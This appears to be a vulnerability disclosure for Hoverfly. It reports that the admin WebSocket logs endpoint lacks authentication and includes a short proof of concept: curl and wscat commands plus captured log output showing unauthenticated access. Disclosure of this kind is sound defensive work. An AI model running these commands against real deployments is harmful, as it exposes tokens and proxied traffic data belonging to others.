Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API.
Consequently, an unauthenticated remote attacker can:
curl -i http://localhost:8888/api/v2/hoverfly/version
wscat -c ws://localhost:8888/api/v2/ws/logs
# Connected (press CTRL+C to quit)
# … logs stream immediately … (You would need to send a message to start receiving stream)
wscat -c ws://localhost:8888/api/v2/ws/logs
Connected (press CTRL+C to quit)
> hi!
< {"logs":[{"level":"info","msg":"Log level set to verbose","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"Using memory backend","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"User added successfully","time":"2025-07-20T17:07:00+05:30","username":""},{"level":"info","msg":"Enabling proxy authentication","time":"2025-07-20T17:07:00+05:30"},{"Destination":".","Mode":"simulate","ProxyPort":"8500","level":"info","msg":"Proxy prepared...","time":"2025-07-20T17:07:00+05:30"},{"destination":".","level":"info","mode":"simulate","msg":"current proxy configuration","port":"8500","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"serving proxy","time":"2025-07-20T17:07:00+05:30"},{"AdminPort":"8888","level":"info","msg":"Admin interface is starting...","time":"2025-07-20T17:07:00+05:30"},{"level":"debug","message":"hi!","msg":"Got message...","time":"2025-07-20T17:09:04+05:30"}]}
< ...
< ...
Authentication bypass, an attacker receives full application logs, including proxied request/response bodies, tokens, file paths, etc.
Kr1shna4garwal Reporter
Summary
Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API.
Consequently, an unauthenticated remote attacker can:
PoC
Impact
Authentication bypass, an attacker receives full application logs, including proxied request/response bodies, tokens, file paths, etc.